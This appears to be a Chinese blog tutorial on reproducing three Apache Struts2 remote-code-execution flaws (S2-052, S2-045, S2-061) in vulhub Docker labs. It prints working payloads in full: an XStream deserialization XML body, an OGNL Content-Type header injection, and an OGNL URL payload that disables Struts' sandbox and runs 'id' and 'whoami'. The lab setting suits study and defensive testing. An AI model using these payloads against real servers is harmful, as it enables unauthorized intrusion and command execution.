Struts2的几个漏洞复现

于 2024-07-08 10:08:36 发布
阅读量606 收藏 24
点赞数 18
文章标签: struts 后端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_rr2004/article/details/140259408
版权

一、环境准备

首先使用docker搭建vulhub环境(这里使用的是ubuntu)

1、下载vulhub

 git clone https://github.com/vulhub/vulhub.git 

2、安装docker-compose

apt install docker-compose

二、漏洞复现

1、复现S2-052漏洞

1.1漏洞原理:

S2-052漏洞原理:

启用Struts  REST插件并使用XStream组件对XML进行反序列操作时,未对数据进行有效验证,可进行远程代码执行攻击。

1.2漏洞复现

(1)切换到S2-052目录下

cd vulhub/struts2/s2-052

 (2)修改映射端口号为8082

vim docker-compose.yml    //修改文件

cat docker-compose.yml    //查看是否修改成功

(3)启动docker

docker-compose up -d

以上图片可以看到运行成功

(4)在浏览器中查看此虚拟机的8082端口

          http://192.168.61.147:8082

(5)进入id为3的edit界面,burpsuite抓包。

(6)send to repeater,修改数据包:

将Content-Type: application/x-www-form-urlencoded改为Content-Type: application/xml

将请求体内容_method=put&clientName=Bob&amount=33改为:

<map>

  <entry>

    <jdk.nashorn.internal.objects.NativeString>

      <flags>0</flags>

      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

        <dataHandler>

          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

            <is class="javax.crypto.CipherInputStream">

              <cipher class="javax.crypto.NullCipher">

                <initialized>false</initialized>

                <opmode>0</opmode>

                <serviceIterator class="javax.imageio.spi.FilterIterator">

                  <iter class="javax.imageio.spi.FilterIterator">

                    <iter class="java.util.Collections$EmptyIterator"/>

                    <next class="java.lang.ProcessBuilder">

                      <command>

                        <string>touch</string>

                        <string>temp/zhengranran.txt</string>

                      </command>

                      <redirectErrorStream>false</redirectErrorStream>

                    </next>

                  </iter>

                  <filter class="javax.imageio.ImageIO$ContainsFilter">

                    <method>

                      <class>java.lang.ProcessBuilder</class>

                      <name>start</name>

                      <parameter-types/>

                    </method>

                    <name>foo</name>

                  </filter>

                  <next class="string">foo</next>

                </serviceIterator>

                <lock/>

              </cipher>

              <input class="java.lang.ProcessBuilder$NullInputStream"/>

              <ibuffer></ibuffer>

              <done>false</done>

              <ostart>0</ostart>

              <ofinish>0</ofinish>

              <closed>false</closed>

            </is>

            <consumed>false</consumed>

          </dataSource>

          <transferFlavors/>

        </dataHandler>

        <dataLen>0</dataLen>

      </value>

    </jdk.nashorn.internal.objects.NativeString>

    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

  </entry>

  <entry>

    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

  </entry>

</map>

点击go:

(7) docker ps 查看靶场容器ID(记住前四位)

进入容器

docker exec -it 6ff4 /bin/bash

(8)ls /tmp 查看文件创建成功

2、复现s2-045漏洞

2.1漏洞原理

文件上传模块在处理文件上传的请求时候对异常信息做了捕获,并对异常信息做了 OGNL表达式处理。可通过注入OGNL语言进行命令执行。

2.2漏洞复现

(1)切换目录,修改映射端口号为8084。

cd vulhub/struts2/s2-045

(2) docker-compose up -d 启动。

(3) 访问:http://192.168.61.147:8084

(4)点击submit,burpsuite抓包。

(5)send to repeater:

将Content-Type: multipart/form-data; boundary=---------------------------862674606196141771994536450

改为Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',120*120)}.multipart/form-data

go启动

3、复现s2-061漏洞

3.1漏洞原理

漏洞缘于对输入验证不足,导致在计算原始用户输入时强制进行两次Object Graph Navigation Library(OGNL)计算。

当在Struts标签属性中强制使用OGNL表达式并可被外部输入修改时,攻击者可构造恶意的OGNL表达式触发漏洞。

3.2漏洞复现

(1) 切换目录;修改映射端口为8085。

cd vulhub/struts2/s2-061

(2) docker-compose up -d 启动。

(3) http://192.168.200.116:8085

(4)验证漏洞是否存在:在url中输入:

http://192.168.200.116:8085/?id=%25%7b+%27test%27+%2b+(11+%2b+11).toString()%7d

按F12查看元素发现”est22”,说明存在漏洞。

(5)构造payload执行命令

?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}

?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27whoami%27}).(%23res%3d%23exec.exec(%23cmd))}

以上就是三个漏洞完整的复现过程,如有不足请指出!

Z_rr2004
关注
  • 18
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Struts2漏洞复现工具
06-24
Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具
Struts2漏洞分析与复现合集
未完成的歌~的博客
08-22 6543
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-001 运行以下命令进行设置 .............
java struts2 漏洞复现合集
whatday的专栏
08-31 4484
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
Struts2漏洞复现
weixin_51151498的博客
12-14 1236
Struts2漏洞复现
漏洞复现Struts2多版本漏洞复现
weixin_42282189的博客
10-12 852
作者:村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 它全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Str.
Struts2漏洞检查工具2018版.rar
03-31
标题中的"Struts2漏洞检查工具2018版.rar"指的是一个专门针对Struts2框架的2018年发布的漏洞检测工具。这个工具可能包含了针对那时已知的Struts2安全问题的扫描功能,帮助系统管理员和开发者识别并修复潜在的安全...
STRUTS2的getClassLoader漏洞利用
01-30
引用《Springframework(cve-2010-1622)漏洞利用指南》:Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
Struts2安全漏洞主要包括以下几类: 1. OGNL(Object-Graph Navigation Language)表达式注入:这是Struts2最著名的漏洞类型,由于框架在处理用户输入时没有进行充分的过滤和验证,攻击者可以通过构造恶意的OGNL...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
Struts2-045漏洞利用工具
08-11
Struts2-045漏洞利用工具
Struts2漏洞利用工具2019版 V2.3.zip
02-24
Struts2漏洞利用工具2019版 V2.3. Struts2漏洞检测工具,请勿非法攻击他人网站,安恒大佬的作品
Vulhub靶场之struts2漏洞复现
weixin_66717977的博客
03-21 1349
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
CVE-2023-50164 Apache Struts2漏洞复现
黑剑
12-15 3329
从本质上讲,该漏洞允许攻击者利用 Apache Struts 文件上传系统中的缺陷。它允许他们操纵文件上传参数并执行路径遍历。这种利用可能会导致在服务器上执行任意代码,从而导致各种后果,例如未经授权的数据访问、系统受损,甚至完全控制受影响的系统,包括在系统中放置恶意文件。仔细一看,CVE-2023-50164涉及Apache Struts的文件上传机制中的一个漏洞。对于非技术受众,想象一下这样一个场景:安全检查点(文件上传机制)由于漏洞而被绕过,从而允许未经授权的访问安全区域(服务器)。
struts2框架漏洞复现
Bird&Bird
01-07 4499
目录1、S2-001远程代码执行漏洞(CVE-2007-4556)漏洞简介影响范围漏洞复现S2-005 远程代码执行漏洞(CVE-2010-1870)漏洞简介影响版本绕过过程漏洞复现 1、S2-001远程代码执行漏洞(CVE-2007-4556) 漏洞简介 当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。 影响范围 Struts 2.0.0 - 2.0.8 漏洞复现 输入%{1+1},返回2就是存在该漏洞。 获取
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
最新发布
qq_53058639的博客
06-08 1417
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。在账号密码的输入框中测试是否存在漏洞
Strtus2历史漏洞复现
懂进攻知防守
07-26 919
S2-015(CVE-2013-2135)原理:如果一个请求与任何其他定义的操作不匹配,它将被匹配*,并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。...
struts2漏洞复现
09-02
Struts2漏洞复现的过程大致可以分为两个步骤,根据引用内容和可以总结如下: 1. 利用远程命令执行漏洞(S2-032)进行漏洞复现: - 打开测试靶场网站,访问其中的index.action路径。 - 利用包含‘${}’和‘%{}’...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值